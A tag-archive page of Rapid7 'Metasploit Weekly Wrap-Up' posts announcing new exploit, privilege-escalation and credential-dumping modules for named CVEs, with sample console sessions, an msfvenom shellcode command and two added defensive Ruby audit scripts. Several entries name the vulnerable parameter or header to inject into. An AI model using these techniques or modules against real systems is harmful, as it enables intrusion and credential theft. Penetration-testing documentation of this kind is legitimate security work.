Tag Archives: Metasploit

Metasploit Weekly Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2022/11/04/metasploit-weekly-wrap-up-182/

C is for cookie


And that’s good enough for Apache CouchDB, apparently. Our very own Jack Heysel added an exploit module based on CVE-2022-24706 targeting CouchDB prior to 3.2.2, leveraging a special default ‘monster’ cookie that allows users to run OS commands.

This fake computer I just made says I’m an Admin

Metasploit’s zeroSteiner added a module to perform Role-based Constrained Delegation (RBCD) on an Active Directory network. If you need someone to vouch for your credentials as an Administrator on a local host and you have a set of specific permissions, this module will allow you to create your own friendly computer object to vouch for you!

Proving your Mettle while watching a fire

FLIR Cameras measure the heat given off by an exothermic reaction, but they also execute Metasploit’s ARM Meterpreter (formerly known as Mettle) payloads as root, thanks to a module by Samy Younsi that takes advantage of CVE-2022-37061, an unauthenticated command injection vulnerability in FLIR AX8 cameras up to and including 1.46.16.

That OpenSSL Vuln was certainly not greater than or equal to the hype

It was a tense and scary Halloween for many when it shouldn’t have been, thanks to a “cryptic” early announcement of an OpenSSL vulnerability that proved to be a bust. On AttackerKB Rapid7 researchers break down why this was not the vuln you feared, or much of a vuln at all.

New module content (5)

  • FLIR AX8 unauthenticated RCE by Samy Younsi (https://www.linkedin.com/in/samy-younsi), Thomas Knudsen (https://www.linkedin.com/in/thomasjknudsen), and h00die-gr3y, which exploits CVE-2022-37061 – This adds an exploit module that targets FLIR AX8 thermal cameras. A command injection vulnerability exists in the id POST parameter to the res.php endpoint, which can be leveraged by an unauthenticated attacker to achieve RCE as the root user.
  • Webmin File Manager RCE by faisalfs10x and jheysel-r7, which exploits CVE-2022-0824 – This adds a module that exploits improper access controls in Webmin File Manager. An authenticated attacker can coerce Webmin into downloading a malicious CGI script from an attacker-controlled HTTP server. After that, the attacker can further use File Manager utilities to set execute permissions on the CGI script, execute it, and achieve RCE as the root user.
  • Apache CouchDB Erlang RCE by 1F98D, Konstantin Burov, Milton Valencia (wetw0rk), _sadshade, and jheysel-r7, which exploits CVE-2022-24706 – A new module has been added to exploit CVE-2022-24706, an RCE within Apache CouchDB prior to 3.2.2 via the Erlang/OTP Distribution protocol, which used a default cookie of "monster" to allow users to connect and run OS commands.
  • Linux Gather ManageEngine Password Manager Pro Password Extractor by Charles Yost, Christophe De La Fuente, Rob Simon, and Travis Kaun – This post module gathers ManageEngine’s Password Manager Pro credentials from the local ManageEngine database.
  • #17181 from zeroSteiner – Adds a new auxiliary/admin/ldap/rbcd module which uses LDAP to set the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the user provided delegate_to datastore option within Active Directory. This technique is used as part of Role Based Constrained Delegation (RBCD) attacks. Example usage: run rhost=192.168.123.13 [email protected] password=p4$$w0rd delegate_to=dc3$ action=WRITE delegate_from=fake_computer. This new module can be used in conjunction with the existing auxiliary/admin/dcerpc/samr_computer module to create the required fake computer account.
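The RBCD write described above lands in the computer object’s msDS-AllowedToActOnBehalfOfOtherIdentity attribute, whose value is a self-relative NT security descriptor. The following is an added example (not code from Metasploit or the rbcd module) that decodes such a descriptor the way a defender auditing RBCD would, listing the SIDs in its DACL and flagging any not on an expected list; the descriptor bytes and SIDs are constructed samples, and the full-control mask value is an assumption about what the attribute usually carries.

```ruby
# Added example (not code from Metasploit or the rbcd module): decode the
# msDS-AllowedToActOnBehalfOfOtherIdentity attribute as a defender auditing RBCD would.
# The attribute value is a self-relative NT security descriptor; each ACCESS_ALLOWED_ACE
# in its DACL names a principal (SID) that may act on behalf of the computer.

SE_DACL_PRESENT = 0x0004
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF   # assumed mask; what RBCD tooling commonly writes

# "S-1-5-21-..." -> binary SID (revision, sub-authority count, 48-bit authority, sub-authorities)
def build_sid(text)
  parts = text.split('-')
  rev, auth = parts[1].to_i, parts[2].to_i
  subs = parts[3..-1].map(&:to_i)
  [rev, subs.size].pack('CC') + [auth].pack('Q>')[2, 6] + subs.pack("V#{subs.size}")
end

# binary SID -> "S-1-5-21-..."
def sid_to_s(bytes)
  rev, count = bytes.unpack('CC')
  auth = bytes[2, 6].unpack('C6').inject(0) { |acc, b| (acc << 8) | b }
  subs = bytes[8, 4 * count].unpack("V#{count}")
  (['S', rev, auth] + subs).join('-')
end

# Builds a constructed sample descriptor of the shape an RBCD write produces:
# header, owner SID, then a DACL with one ACCESS_ALLOWED_ACE per delegating principal.
def build_rbcd_descriptor(delegate_from_sids, mask = FULL_CONTROL)
  owner = build_sid('S-1-5-32-544')                      # BUILTIN\Administrators (sample owner)
  aces = delegate_from_sids.map do |s|
    sid = build_sid(s)
    [ACCESS_ALLOWED_ACE_TYPE, 0, 8 + sid.bytesize, mask].pack('CCvV') + sid
  end.join
  acl = [4, 0, 8 + aces.bytesize, delegate_from_sids.size, 0].pack('CCvvv') + aces  # ACL_REVISION_DS
  off_owner = 20                                          # SECURITY_DESCRIPTOR_RELATIVE header size
  off_dacl  = off_owner + owner.bytesize
  control   = 0x8000 | SE_DACL_PRESENT                    # SE_SELF_RELATIVE | SE_DACL_PRESENT
  [1, 0, control, off_owner, 0, 0, off_dacl].pack('CCvVVVV') + owner + acl
end

# Parses the descriptor and returns the principals allowed to act on behalf of the computer.
def parse_rbcd_descriptor(sd)
  rev, _sbz1, control, _off_owner, _off_group, _off_sacl, off_dacl = sd.unpack('CCvVVVV')
  raise ArgumentError, "unsupported SD revision #{rev}" unless rev == 1
  return [] if (control & SE_DACL_PRESENT).zero? || off_dacl.zero?   # no DACL: nobody delegated
  acl = sd[off_dacl..-1]
  _acl_rev, _sbz2, _acl_size, ace_count = acl.unpack('CCvv')
  pos = 8
  allowed = []
  ace_count.times do
    ace_type, _flags, ace_size = acl[pos, 4].unpack('CCv')
    if ace_type == ACCESS_ALLOWED_ACE_TYPE
      mask = acl[pos + 4, 4].unpack1('V')
      allowed << { sid: sid_to_s(acl[pos + 8, ace_size - 8]), mask: mask }
    end
    pos += ace_size
  end
  allowed
end

# Audit helper: SIDs that may impersonate users to this computer but are not on the
# expected list (an unexpected, recently created machine account is the RBCD tell).
def unexpected_delegations(sd, expected_sids)
  parse_rbcd_descriptor(sd).map { |e| e[:sid] }.reject { |s| expected_sids.include?(s) }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample: a domain-joined computer with one principal written into the attribute.
  sample = build_rbcd_descriptor(['S-1-5-21-1004336348-1177238915-682003330-1128'])
  parse_rbcd_descriptor(sample).each { |e| printf("%-50s mask=0x%08X\n", e[:sid], e[:mask]) }
end
```

In a real audit the descriptor bytes come from an LDAP read of the attribute on each computer object; anything listed that is not an expected service account is worth investigating.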

Enhancements and features (6)

  • #17155 from h00die – This PR updates version checking for the recent Remote mouse RCE module and updates the docs with a vulnerable version download link.
  • #17184 from adfoster-r7 – Updates the metashell upload/download commands to work for PowerShell and Windows sessions.
  • #17186 from adfoster-r7 – Fixes broken file writes on windows targets when newlines are present within the uploaded file.
  • #17195 from adfoster-r7 – Fixes uploading binary files with identical names to a Windows shell session. Previously this would silently error and not write the new file contents; now the file contents are successfully written out.
  • #17196 from bcoles – Adds new get_hostname library support for Windows sessions.
  • #17207 from memN0ps – Updates msfvenom and msfconsole to support formatting shellcode as a Rust array. Example usage: msfvenom -p windows/x64/exec cmd='calc.exe' -f rust.

Bugs fixed (3)

  • #17188 from zeroSteiner – Fixes a regression issue that stopped Python Meterpreter from working on v3.1-3.3.
  • #17190 from zeroSteiner – This sets the bufptr parameter in multiple netapi32 railgun functions to the PLPVOID data type and consequently fixes a crash in the post/windows/gather/enum_domain_tokens module caused by improper data types being set for the bufptr parameter.
  • #17213 from bwatters-r7 – Fixes a bug that stopped the post/linux/gather/vcenter_secrets_dump module from loading.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Shelby Pace original https://blog.rapid7.com/2022/10/28/metasploit-weekly-wrap-up-180/

GLPI htmLawed PHP Command Injection


Our very own bwatters-r7 wrote a module for an unauthenticated PHP command injection vulnerability that exists in various versions of GLPI. The vulnerability is due to a third-party vendor test script being present in default installations. A POST request to vendor/htmlawed/htmlawed/htmLawedTest.php directly allows an attacker to execute exec() through the hhook and test parameters, resulting in unauthenticated RCE as the www-data user. The GLPI project has released an advisory detailing patched versions available for download and also noting that this vulnerability has been seen exploited in the wild.

Vagrant Breakout Exploit

Community contributor bcoles added a module that exploits a built-in Vagrant feature to break out of a Vagrant box and gain access to the host system. Specifically, the shared project folder that exists on the host is mounted on the guest Vagrant box as a writable directory, and the project’s configuration file exists there. Every time a user on the host executes a vagrant command from within the project directory, the Ruby code within the config file gets executed. As a result, an attacker can add arbitrary code to the config file, wait for the user to run a vagrant command, and then gain a shell on the host system with the privileges of the user who ran the command. Since there is no intention to patch this issue, denying the shared folders feature for Vagrant projects is the best way to prevent this.
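The mitigation the paragraph recommends is to stop sharing the project directory with the guest, which in a Vagrantfile means disabling the default "." to /vagrant synced folder. The following is an added example (not code from the Metasploit module or from Vagrant): a tiny stand-in for the Vagrantfile DSL that records synced_folder declarations so a Vagrantfile can be checked for that mitigation without running vagrant. The two Vagrantfiles are constructed samples, and the check assumes the project directory is exposed whenever the /vagrant share is not explicitly disabled or any other share of "." is enabled.

```ruby
# Added example (not code from the Metasploit module or from Vagrant): a stub of the
# Vagrantfile DSL that records synced_folder declarations, so a project's Vagrantfile can be
# checked for the mitigation the post recommends: disabling the default "." -> /vagrant share
# through which the guest can edit the host's Vagrantfile.

# Constructed sample: mitigation applied.
MITIGATED_VAGRANTFILE = <<~'VF'
  Vagrant.configure("2") do |config|
    config.vm.box = "generic/ubuntu2204"
    # Do not expose the project directory (and this file) to the guest.
    config.vm.synced_folder ".", "/vagrant", disabled: true
  end
VF

# Constructed sample: Vagrant's default, the project directory is writable from the guest.
DEFAULT_VAGRANTFILE = <<~'VF'
  Vagrant.configure("2") do |config|
    config.vm.box = "generic/ubuntu2204"
    config.vm.provider "virtualbox" do |vb|
      vb.memory = 2048
    end
  end
VF

# Stands in for config.vm: records synced_folder calls, swallows every other DSL call.
class VmStub
  attr_reader :synced_folders

  def initialize
    @synced_folders = []
  end

  def synced_folder(host, guest, **opts)
    @synced_folders << { host: host, guest: guest, disabled: opts.fetch(:disabled, false) }
  end

  def method_missing(*_args)
    self
  end
end

# Stands in for the config object yielded by Vagrant.configure.
class ConfigStub
  attr_reader :vm

  def initialize
    @vm = VmStub.new
  end

  def method_missing(*_args)
    self
  end
end

module Vagrant
  def self.configure(_version)
    cfg = ConfigStub.new
    yield cfg
    cfg
  end
end

# Returns the recorded shares of the project directory ("." on the host).
def project_shares(vagrantfile_text)
  # A Vagrantfile is Ruby, which is the whole problem; only eval files you are auditing.
  cfg = eval(vagrantfile_text, binding, 'Vagrantfile')
  cfg.vm.synced_folders.select { |f| f[:host] == '.' }
end

# True when the guest gets no writable mount of the project directory: the default
# /vagrant share is explicitly disabled and no other share of "." is enabled.
def default_share_disabled?(vagrantfile_text)
  shares = project_shares(vagrantfile_text)
  default = shares.find { |f| f[:guest] == '/vagrant' }
  return false if default.nil? || !default[:disabled]   # default share still active
  shares.none? { |f| f[:guest] != '/vagrant' && !f[:disabled] }
end

if __FILE__ == $PROGRAM_NAME
  { 'mitigated' => MITIGATED_VAGRANTFILE, 'default' => DEFAULT_VAGRANTFILE }.each do |name, text|
    state = default_share_disabled?(text) ? 'not exposed' : 'EXPOSED'
    puts "#{name}: project directory #{state} to guest"
  end
end
```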

vCenter Secrets Dump Module

h00die and npm-cesium137-io submitted a post module that targets vCenter appliances. Using an elevated session, this module collects DC credentials, SSO user accounts and hashes, domain information, certificates, and more. The information gathered can be used to add new SSO admin users to vCenter, sign forged SAML assertions, and to dump more data via the auxiliary/gather/vmware_vcenter_vmdir_ldap module.

New module content (3)

  • GLPI htmLawed PHP command injection by bwatters-r7 and cosad3s, which exploits CVE-2022-35914 – This PR adds a module for CVE-2022-35914, a PHP command injection vulnerability in GLPI versions up to and including 10.0.2.
  • Vagrant Synced Folder Vagrantfile Breakout by bcoles – This PR adds a module that exploits a default Vagrant shared folder to append a Ruby payload to the Vagrant project Vagrantfile config file. The payload gets executed the next time the user runs a vagrant command.
  • vCenter Secrets Dump by h00die and npm-cesium137-io – This PR adds the post/linux/gather/vcenter_secrets_dump module to dump vCenter vmdir dcAccountPassword and platform certificates.

Enhancements and features (7)

  • #16979 from gwillcox-r7 – This improves the existing ldap_query module by allowing it to decode some data types into a human readable format.
  • #17050 from usiegl00 – This updates the osx stager to no longer write artifacts to disk when performing in-memory code loading.
  • #17071 from gwillcox-r7 – This adds additional predefined LDAP queries to the existing ldap_query module that can help enumerate specific information in support of certain attack paths.
  • #17128 from cgranleese-r7 – Updates auxiliary/scanner/smb/smb_enumshares to support specifying a share name such as run smb://Account:Password@TargetIP spidershares=true showfiles=true share=TargetShareName. Useful files are now also highlighted automatically.
  • #17164 from r3nt0n – This adds a new option, THEME_DIR to the exploit/multi/http/wp_crop_rce module that is useful when the current WordPress theme cannot be auto-detected by the module or when a user leverages other means of determining the theme.
  • #17176 from llamasoft – This updates the Python Meterpreter stage to calculate the necessary data for AES encryption at runtime which reduces the stage size by about 6,000 bytes.
  • #17185 from adfoster-r7 – Updates msfconsole’s tips command to include the analyze command, as well as hosts -R and services -R.

Bugs fixed (2)

  • #17172 from bcoles – Fixes a bug in Msf::Post::File.append_file which caused file contents to be overwritten on non-Windows sessions.
  • #17187 from ErikWynter – Fixes an issue in the aerohive_netconfig_lfi_log_poison_rce exploit module that resulted in the vulnerable version 10.0r8 being flagged as non-vulnerable.


Metasploit Weekly Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/10/21/metasploit-weekly-wrap-up-181/

Zimbra with Postfix LPE (CVE-2022-3569)


This week rbowes added an LPE exploit for Zimbra with Postfix. The exploit leverages a vulnerability whereby the Zimbra user can run postfix as root which in turn is capable of executing arbitrary shellscripts. This can be abused for reliable privilege escalation from the context of the zimbra service account to root. As of this time, this vulnerability remains unpatched.

Zimbra RCE (CVE-2022-41352)

rbowes also added an RCE for Zimbra. This exploit can be used to remotely obtain the initial access necessary to exploit CVE-2022-3569 and escalate privileges to root. It leverages a path traversal vulnerability to write a malicious JSP file to the web directory, which yields code execution. The vulnerability does not require authentication; however, it should be noted that pax must not be present on the target in order for it to be exploitable. A Zimbra patch adds pax as a requirement, so either the patch must not have been applied or pax must have been explicitly removed.

FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass (CVE-2022-40684)

Community member heyder submitted an exploit for multiple Fortinet products this week. The exploit involves an authentication bypass that is leveraged to establish an SSH session with the target. Unfortunately, the FortiGate v7.2.1 instance used during testing indicated that the target could not be used for SSH port forwarding.

Improved Qualys Scan Import Performance

Metasploit is capable of importing scan data produced by a variety of tools such as Qualys and Nessus. This week jmartin switched the XML parser used while processing Qualys scan files to obtain a dramatic performance improvement. Scan data which previously took hours to import now takes only a few minutes.

New module content (4)

Enhancements and features (4)

  • #16982 from h00die – Updates the Dell iDRAC login scanner to work with version 8 and version 9.
  • #17135 from k0pak4 – This adds proper namespace to the hash identification library to avoid any potential collision with the constants defined previously.
  • #17140 from nfsec – The Metasploit Docker image’s Alpine version has been bumped from 3.12 to 3.15.
  • #17154 from jmartin-r7 – The process for importing Qualys scan data has been switched over from REXML to using Nokogiri::XML and XPath for improved performance.

Bugs fixed (1)

  • #17157 from k0pak4 – Setting the global options to set LHOST for all modules will now be properly respected when loading a module, whereas before only the globally set RHOST option would be respected.


Metasploit Wrap-Up

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2022/10/14/metasploit-wrap-up-155/

Spring Cloud Gateway RCE


This week, a new module that exploits a code injection vulnerability in Spring Cloud Gateway (CVE-2022-22947) has been added by @Ayantaker. Versions 3.1.0 and 3.0.0 to 3.0.6 are vulnerable if the Gateway Actuator endpoint is enabled, exposed and unsecured. The module sends a specially crafted SpEL expression to this endpoint and gets command execution as the user running Spring Cloud Gateway. A first request is sent to create a route with a filter including the SpEL expression which will be parsed with a StandardEvaluationContext. A second request is sent to reload the route and trigger code execution.

pfSense pfBlockNG plugin unauthenticated RCE

Our very own @jheysel-r7 added a module that exploits an OS command injection vulnerability in pfSense’s pfBlockerNG plugin versions 2.1.4_26 and below, identified as CVE-2022-31814. The module sends an HTTP request with a payload in the Host: header, which will be executed by PHP’s exec() function. This leads to unauthenticated remote command execution as root. Note that this pfSense module is not installed by default but is commonly used to block inbound connections from countries or IP ranges.

New module content (2)

  • Spring Cloud Gateway Remote Code Execution by Ayan Saha, which exploits CVE-2022-22947 – A new module has been added in for CVE-2022-22947, an unauthenticated RCE in Spring Cloud Gateway versions 3.1.0 and 3.0.0 to 3.0.6 when the Gateway Actuator endpoint is enabled, exposed and unsecured. Successful exploitation results in arbitrary code execution as the user running Spring Cloud Gateway.
  • pfSense plugin pfBlockerNG unauthenticated RCE as root by IHTeam and jheysel-r7, which exploits CVE-2022-31814 – A module has been added for CVE-2022-31814, an unauthenticated RCE in the pfSense pfBlockerNG plugin that allows remote unauthenticated attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. Versions <= 2.1.4_26 are vulnerable. Note that version 3.X is unaffected.

Enhancements and features (2)

  • #17123 from h00die – The netrc and fetchmail modules have been updated to include documentation on how to use the modules.
  • #17092 from bcoles – This PR updates the netlm_downgrade module, providing documentation, extending it to support more session types, and fixing some bugs that were present which caused false-positive warnings to appear.

Bugs fixed (3)

  • #16987 from jmartin-r7 – Improves scanner/smb/smb_login to gracefully handle additional error conditions when connecting to target services.
  • #17075 from cdelafuente-r7 – The Windows secrets dump module was failing early for non-administrative users. This fixes the issue so the module now throws warnings where it was previously failing early. Now the module can complete the DOMAIN action whereas before it was failing prior to reaching this point.


Metasploit Weekly Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/10/07/metasploit-weekly-wrap-up-179/

Bofloader – Windows Meterpreter Gets Beacon Object File Loader Support


This week brings a new and frequently requested feature to the Windows Meterpreter, the Beacon Object File loader. This new extension, bofloader, allows for users to execute Beacon Object Files as written for either Cobalt Strike or Sliver. This extension was provided by a group effort among community members kev169, GuhnooPlusLinux, R0wdyJoe, and skylerknecht.

Documentation is available on the new docs site which walks through using the new extension. Since the bofloader is a full-fledged extension, it can be used without loading stdapi which has been noted as an important setting (set AutoLoadStdapi false) for avoiding detection.

Once a Meterpreter session is loaded along with the bofloader extension, the execute_bof command becomes available. The user needs to specify a path to their BOF file and any necessary arguments.

msf6 exploit(windows/smb/psexec) > set AutoLoadStdapi false
AutoLoadStdapi => false
msf6 exploit(windows/smb/psexec) > exploit


[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Executing the payload...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (200774 bytes) to 192.168.159.10
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:62900) at 2022-10-07 12:10:21 -0400


meterpreter > load bofloader
Loading extension bofloader...

meterpreter                  
   ▄▄▄▄    ▒█████    █████▒  
  ▓█████▄ ▒██▒  ██▒▓██   ▒   
  ▒██▒ ▄██▒██░  ██▒▒████ ░   
  ▒██░█▀  ▒██   ██░░▓█▒  ░   
  ░▓█  ▀█▓░ ████▓▒░░▒█░      
  ░▒▓███▀▒░ ▒░▒░▒░  ▒ ░      
  ▒░▒   ░   ░ ▒ ▒░  ░     ~ by @kev169, @GuhnooPluxLinux, @R0wdyJoe, @skylerknecht ~
   ░    ░ ░ ░ ░ ▒   ░ ░      
   ░          ░ ░  loader    
        ░                    


Success.
meterpreter > execute_bof ../CS-Situational-Awareness-BOF/SA/whoami/whoami.x64.o
[*] No arguments specified, executing bof with no arguments.


UserName		SID
====================== ====================================
MSFLAB\DC$	S-1-5-18




GROUP INFORMATION                                 Type                     SID                                          Attributes               
================================================= ===================== ============================================= ==================================================
BUILTIN\Administrators                            Alias                    S-1-5-32-544                                  Enabled by default, Enabled group, Group owner, 
Everyone                                          Well-known group         S-1-1-0                                       Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\Authenticated Users                  Well-known group         S-1-5-11                                      Mandatory group, Enabled by default, Enabled group, 
Mandatory Label\System Mandatory Level            Label                    S-1-16-16384                                  Mandatory group, Enabled by default, Enabled group, 




Privilege Name                Description                                       State                         
============================= ================================================= ===========================
SeAssignPrimaryTokenPrivilege Replace a process level token                     Disabled                      
...             


meterpreter > 

If MinGW is available, BOF files can be compiled from source code using the --compile flag.

meterpreter > execute_bof ../../OutputStreams.c --compile
[*] No arguments specified, executing bof with no arguments.
[CALLBACK_OUTPUT]: message
[CALLBACK_ERROR]:  message

meterpreter > 

Finally, BOF files which require arguments can be called if the user knows their format. This information would typically come from either reading the BOF file’s source code or documentation. In the following example, the nslookup BOF takes two UTF-8 strings, followed by one int16. The format string details can be found in the documentation along with a table for quick reference in the --help output.

meterpreter > execute_bof ../CS-Situational-Awareness-BOF/SA/nslookup/nslookup.x64.o --format-string zzs metasploit.com 192.168.250.4 1
A metasploit.com 18.67.65.57
A metasploit.com 18.67.65.86
A metasploit.com 18.67.65.104
A metasploit.com 18.67.65.65
NS com f.gtld-servers.net
NS com a.gtld-servers.net
...

meterpreter >

WordPress Elementor RCE – CVE-2022-1329

This week community contributors AkuCyberSec, Ramuel Gall, and h00die landed a nice module for CVE-2022-1329, an authenticated vulnerability in the Elementor Website Builder Plugin for WordPress that allows unauthorized execution of several AJAX actions.

Any authenticated user can exploit this vulnerability to upload a PHP file onto the website. The module takes advantage of this vulnerability to request that the Elementor plugin try to install Elementor Pro from a user-supplied zip file, which is something any user with Subscriber permissions or higher can do. Once the PHP file is uploaded to the target website, the attacker can then browse to the page hosting their PHP file to get RCE as the www-data user.

Ubuntu Enlightenment Mount Priv Esc – CVE-2022-37706

It’s been a while since we last had a Linux LPE in the framework for Ubuntu, but thanks to some work from community contributors Maher Azzouzi and h00die, we have an exploit for CVE-2022-37706. This takes advantage of a bug within one of Linux’s window managers, called Enlightenment, and occurs due to a command injection vulnerability in Enlightenment’s enlightenment_sys binary. Versions prior to Enlightenment 0.25.4 are vulnerable and can be exploited by authenticated users who have a userland shell to gain arbitrary code execution as the root user.

Remote Mouse Server RCE – Unpatched

Community contributors 0RPHON, H4rk3nz0, and h00die brought us a nice vulnerability this week for an unauthenticated RCE via the Emote Interactive protocol, aka CVE-2022-3365. The bug occurs since the authentication for the Emote Interactive protocol never seemed to be enforced according to 0RPHON, the original bug discoverer. Attackers can utilize this vulnerability to gain unauthenticated RCE as the user running Remote Mouse Server. Note that whilst a CVE is assigned, the bug is still unpatched at the time of writing.

New module content (6)

Enhancements and features (3)

Bugs fixed (3)

  • #17072 from smashery – This PR fixes a regression discovered when session interaction hangs because a file slated for cleanup is in use, so the framework side times out, but the shell side does not. The fix also includes more robust handling for shell tokens in all types of shells.
  • #17078 from cgranleese-r7 – This PR updates the deprecated report_auth_info method calls in the modules/auxiliary/scanner/rservices/ modules to now make use of create_credential instead.
  • #17091 from bcoles – Fixes module metadata for stability and reliability for several modules.


Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2022/09/30/metasploit-weekly-wrap-up-178/

Veritas Backup Exec Agent RCE


This module kindly provided by c0rs targets the Veritas Backup Exec Agent in order to gain RCE as the system/root user.
The exploit itself is actually a chain of 3 separate CVEs (CVE-2021-27876, CVE-2021-27877 and CVE-2021-27878) which only makes it more impressive.
While you’re patching, why not take the time to test your backups too.

Hikvision IP Camera user impersonation

This vulnerability has been present in Hikvision products since 2014 and comes to us courtesy of h00die-gr3y.
The main culprit here is Hikvision’s authentication mechanism, which allows you to log in as any valid user using only their username. From that point, this module lets you set a new password for the chosen username, so you can then log in "legitimately".

New module content (6)

  • Hikvision IP Camera Unauthenticated Password Change Via Improper Authentication Logic by Monte Crypto and h00die-gr3y, which exploits CVE-2017-7921 – A new module has been added in for CVE-2017-7921, an improper authentication logic bug in HikVision cameras. Successfully exploiting this vulnerability allows unauthenticated attackers to impersonate any valid user on the affected camera, which can be used to gain full control over the camera.
  • Netfilter nft_set_elem_init Heap Overflow Privilege Escalation by Arthur Mongodin and Redouane NIBOUCHA, which exploits CVE-2022-34918 – This is a local-privilege escalation exploit targeting CVE-2022-34918, a vulnerability in the Netfilter component of the Linux kernel.
  • qdPM 9.1 Authenticated Arbitrary PHP File Upload (RCE) by Giacomo Casoni, Leon Trappett (thepcn3rd), and Rishal Dwivedi (Loginsoft), which exploits CVE-2020-7246 – Adds an exploit that targets an authenticated arbitrary file upload vulnerability to gain code execution on qdPM 9.1 and lower.
  • Veritas Backup Exec Agent Remote Code Execution by Alexander Korotin, which exploits CVE-2021-27878 – This module exploits a chain of the vulnerabilities CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878 in Veritas Backup Exec Agent which leads to remote code execution with privileges of system or root user.
  • Mobile Mouse RCE by CHOKRI HAMMEDI and h00die – This PR includes a module that uses default configuration in Unified Remote to spawn a run prompt and return a shell.
  • Wifi Mouse RCE by H4RK3NZ0, REDHATAUGUST, and h00die, which exploits CVE-2022-3218 – A new module has been added for CVE-2022-3218, an unpatched (at the time of publication) authentication bypass in WiFi Mouse (Mouse Server) from Necta LLC which can be used to gain RCE as the user running Wifi Mouse (Mouse Server).

Enhancements and features (2)

  • #16981 from bcoles – This PR fixes several bugs as well as style and documentation inconsistencies, and implements new library methods.
  • #17048 from bcoles – This PR updates the enum_token module by adding documentation, clarifying the description, improving efficiency, and leveraging library code.

Bugs fixed (3)

  • #16994 from zeroSteiner – Fixes multiple issues with registry manipulation on opened sessions.
  • #17054 from zeroSteiner – Fixes a crash when using the info and generate commands for adapted single (unstaged) payloads – such as cmd/windows/powershell/meterpreter/reverse_tcp.
  • #17073 from cgranleese-r7 – Fixes a bug where sessions opened by running one of the rexec_login / rlogin_login / rsh_login modules would die after module completion.


Metasploit Weekly Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2022/09/23/metasploit-weekly-wrap-up-177/

Have you built out that awesome media room?


If your guilty pleasures include using a mobile device to make your home entertainment system WOW your guests, you might be using Unified Remote. I hope you are extra cautious about what devices you let on that WiFi network. Prolific community member h00die added a module this week that uses a recently published vulnerability from H4RK3NZ0 to leverage an unprotected configuration page exposed on the media service; combined with just a little bit of protocol info, the module makes that media server a prime target for pranks and other less friendly activities by guests on the network.

Finding the needles in that Linux memory stack

Brought to you by the combined efforts of many members of the Metasploit community, Linux Meterpreter payloads now offer a new way to hunt down passwords in memory on all those delicious Linux sessions you gather with Metasploit. The new post/linux/gather/mimipenguin module hunts down clear-text passwords in Linux memory, based on MimiPenguin.

We all love to share code with the public

A new module this week makes sharing public code risky business if you are using a Bitbucket server to host that repository. Check out the nitty gritty in our blog post from earlier this week.

Metasploit plays well with others

Last week’s update brought with it an awesome way to utilize Metasploit with payloads generated by Sliver, which even earned a call-out in their latest release notes. Great to see the community promoting these updates for more people to learn about and utilize.

New module content (4)

Enhancements and features (6)

  • #16940 from adfoster-r7 – Rewrites Metasploit’s datastore to fix multiple bugs and edge cases. The unset command will now consistently unset previously set datastore values, so that default values are used once again. Explicitly clearing a datastore value can be done with the set --clear OptionName command. Modules that require protocol specific option names such as SMBUser/FTPUser/BIND_DN/etc can now be consistently set with just username/password/domain options, i.e. set username Administrator instead of set SMBUser Administrator. This rewrite is currently behind a feature flag which can be enabled with features set datastore_fallbacks true.
  • #17002 from bcoles – The lib/msf/core/post/windows/accounts.rb, lib/msf/core/post/windows/ldap.rb, and lib/msf/core/post/windows/wmic.rb libraries have been updated to replace calls to load_extapi with ExtAPI compatibility checks, which check whether the session supports ExtAPI; if it does, ExtAPI should already be loaded.
  • #17003 from bcoles – enum_patches has had its code updated to output the patches enumerated as a table and store the results long term in a CSV file. Additionally, a check has been added to see if the current session supports the required Meterpreter extension compatibility prior to trying to run the module. Finally, the code and documentation have been cleaned up and modernized.
  • #17015 from jmartin-r7 – Updates auxiliary/scanner/http/http_login to report login success when the http status code is in the range 200,201,300-308. This functionality is user-configurable with set HttpSuccessCodes 200.
  • #17049 from bcoles – Adds Notes module meta information and replaces custom get_members method with get_members_from_group from the Post API.
  • #17051 from bcoles – Adds module documentation, notes for module meta information, and improves module error handling.

Bugs fixed (3)

  • #17023 from zeroSteiner – The post/windows/manage/rollback_defender_signatures module has been updated to work on WoW64 sessions, and has had its code updated so that the default action is now a valid option.
  • #17036 from zeroSteiner – Fixes a bug where the sessions command would show the connection as coming from localhost 127.0.0.1 instead of the correct peer host address for reverse_http Meterpreter sessions.
  • #17052 from adfoster-r7 – Fixes an error in Metasploit-framework when the host machine has OpenSSL 3.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Zachary Goldman original https://blog.rapid7.com/2022/09/16/metasploit-weekly-wrap-up-176/

BYOS: Bring your own stager


